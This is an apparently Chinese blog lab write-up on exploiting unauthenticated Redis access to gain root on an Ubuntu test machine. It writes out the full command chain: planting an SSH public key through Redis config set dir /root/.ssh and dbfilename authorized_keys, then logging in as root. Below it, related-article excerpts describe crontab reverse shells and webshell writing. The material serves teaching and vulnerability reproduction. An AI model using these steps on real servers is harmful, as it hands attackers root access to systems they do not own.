Redis未授权访问漏洞利用实验

最新推荐文章于 2024-09-09 15:19:39 发布
原创 最新推荐文章于 2024-09-09 15:19:39 发布 · 300 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redis #安全漏洞

本文详细介绍了如何利用Redis未授权访问漏洞在Ubuntu靶机上获取root权限,涉及环境配置、漏洞利用步骤和安全防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Redis未授权访问漏洞利用实验

漏洞描述

Redis在默认的情况下,会绑定在本地的6379端口上,如果没有采用相关的防火墙策略,就会将Redis服务暴露在公网上;

对Redis配置不当将会导致未授权访问漏洞,从而被攻击者利用。在特定条件下,如果Redis以root身份运行,攻击者可以用root权限的身份写入ssh公钥文件,并通过ssh的方式远程登陆目标服务器,进而导致服务器权限被获取或者是信息泄露等一系列安全问题。

实验环境

Ubuntu18(靶机)
kali2020.1(攻击机)

实验条件

首先,要保证目标机器上安装有redis服务,以及ssh服务,并确保两者都是开启状态。同时,有需要的情况下还应当修改靶机上的ssh配置文件使其允许无密钥的登录;同时,在redis的配置文件中也应当将将protected-mode的那一行设置为no

实验过程

首先,通过redis 的命令连接到目标的redis 的服务上,然后再用info命令检验未授权访问漏洞是否存在。

redis-cli -h x.x.x.x
info

在这里插入图片描述
在这里可以看到是能够得到信息的,所以说靶机上的redis服务是存在未授权访问漏洞的。
咱们的目标是要利用这个漏洞然后连接到靶机所以需要现在本机上生成一个ssh的公钥

ssh-keygen -t rsa

在这里插入图片描述
然后将生成的密钥保存到本地的一个文件中

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

在这里插入图片描述
将公钥写入靶机的redis缓存中

cat key.txt | redis-cli -h 192.168.59.132 -x set xxx

在这里插入图片描述
然后更改配置文件,查看一下公钥是否已经导入靶机中。

config set dir /root/.ssh
config set dbfilename authorized_keys
save

在这里插入图片描述
然后开启靶机的ssh服务用刚才在生成密钥时在passphrase中输入的密码进行登录,这里我用的就是空密码。

ssh root@192.168.59.132

在这里插入图片描述
成功用ssh连到目标机器并获得root权限。试验结束

Redis未授权访问漏洞利用
Au
02-28 1930
Redis是一个开源的高性能的key-value数据库 默认端口6379 Redis因配置不当可以未授权访问,攻击者无需认证访问到内部数据,可导致敏感信息泄露 漏洞利用:核心就是进行写文件操作 可以获取敏感信息,操作数据库,SSH远程登录,写入webshell 环境搭建: kali 2019(攻击机)ip: 192.168.25.137 Ubuntu 16.04 (靶机,...
Redis未授权访问漏洞利用姿势的五种基础姿势
weixin_74182283的博客
03-27 1208
进行一个定时任务的配置指定路径与文件名,set 一个键名叫x 后面那一堆都是他的值 \n是为了隔开其他的信息(同第一段那个意思)其中的*表示时间(年月日 ) 这里为*表示每分钟都在执行这个任务(将数据一直反弹) 后面的/bin/bashxx就是一个反弹shell的正常写法,确认反弹到的主机(将靶机的信息反弹到攻击机kali上,ip就写kali的 8888为开启监听的端口)0>& 这玩意就是将标准输入重定向到标准输出,确保都能被执行到 确保交互性,反弹shell不会轻易断开。
redis未授权访问漏洞利用
zkaqlaoniao的博客
11-16 607
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis未授权访问漏洞利用之前已经远程连接到的redis数据库,利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
redis未授权漏洞利用
m0_63615772的博客
04-29 1732
利用这个漏洞我们一般会去实现写入webshell、写入ssh公钥、在crontab里写定时任务,反弹shell这三种,我们依次来实现。攻击机:192.168.112.1(window10)靶机 :192.168.112.188(centos7)
Redis未授权访问漏洞
周星星的博客
08-22 1695
Redis未授权访问漏洞复现以及利用
Redis未授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1454
redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
漏洞复现之Redis未授权访问
m0_56190544的博客
09-13 2958
本文详细介绍了redis未授权访问漏洞的原理以及利用方法,供大家参考学习
redis非授权访问漏洞
weixin_43995159的博客
11-29 1352
复现了三种redis未授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
关于Redis未授权访问漏洞利用的介绍与修复建议
09-09
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API,下面这篇文章主要给大家介绍了关于Redis未授权访问漏洞利用的介绍和修复建议,文中介绍的非常详细,需要的朋友可以参考下。
修补--Redis未授权访问漏洞
weixin_30342209的博客
01-09 405
--------------------------------阿里云解决方案-----------------------------------一.漏洞描述Redis因配置不当可以导致未授权访问,被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服...
redis未授权漏洞利用总结
Echo__h的博客
09-09 1374
redis默认端口6379,在默认配置情况下密码为空,因此如果将redis暴露到公网,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据,并且可以利用redis写入shell、写入SSH公钥等危险操作。
Redis未授权访问漏洞的重现与利用
qq_40882763的博客
03-24 2336
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
Redis未授权访问漏洞复现与利用
Forget_liu的博客
06-07 3047
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
Redis未授权访问漏洞利用详解
LUOBIKUN的博客
10-19 2114
redis未授权访问漏洞详解简介:复现环境搭建安装redis修改配置文件利用利用姿势1,redis写入ssh公钥,获取操作系统权限利用姿势2,直接向Web目录中写webshell利用姿势3,linux计划任务执行命令反弹shell:原理:cron介绍示例:修复建议 简介: Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis
Redis 未授权访问漏洞利用及修复
Thunderclap的博客
06-25 4290
Redis 未授权访问漏洞利用及修复
Redis未授权访问漏洞复现
最新发布
01-20
### Redis 未授权访问漏洞复现步骤 对于 Redis 未授权访问漏洞的复现,可以按照以下方法进行操作: #### 配置环境准备 为了模拟真实的攻击场景并测试安全措施的有效性,需先搭建一个实验环境。确保所使用的 Redis 实例处于隔离环境中,以免造成实际生产系统的风险。 #### 设置无认证模式下的 Redis 服务 默认情况下,如果 Redis 安装完成后没有配置 `requirepass` 参数,则任何客户端都可以连接到该实例而无需提供密码验证[^3]。 ```bash # 查看当前配置状态 cat /usr/local/redis/6379.conf | grep requirepass ``` 当发现上述命令返回为空时,意味着此时 Redis 正运行于开放状态下,允许任意 IP 地址发起请求。 #### 利用工具探测目标主机上的 Redis 状态 通过 nmap 或者其他网络扫描器来检测远程机器上是否存在暴露在外网端口为 6379 的 Redis 数据库实例,并尝试与其建立连接。 ```bash nmap -p 6379 <target_ip> ``` 一旦确认存在这样的情况,就可以利用 Python 脚本或者其他编程语言编写简单的程序去读取或写入数据至数据库内。 #### 执行恶意指令 假设已经成功连上了这台脆弱的服务端设备,那么攻击者便能执行诸如获取键值对、修改配置甚至是发送 shutdown 关闭服务器等危险动作[^2]。 ```python import redis r = redis.Redis(host='<target_ip>', port=6379, db=0) print(r.get('some_key')) # 获取某个 key 对应 value r.set('new_key', 'value') # 插入新的记录 r.config_set('dir', '/tmp/') # 更改工作目录以便后续保存 RDB 文件 r.save() # 强制立即持久化内存中的数据集到磁盘 ``` 以上就是关于 Redis 未授权访问漏洞的一个简单重现过程描述。值得注意的是,在真实世界里实施此类行为属于非法入侵计算机信息系统罪,请务必仅限于合法合规的学习研究用途之内。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值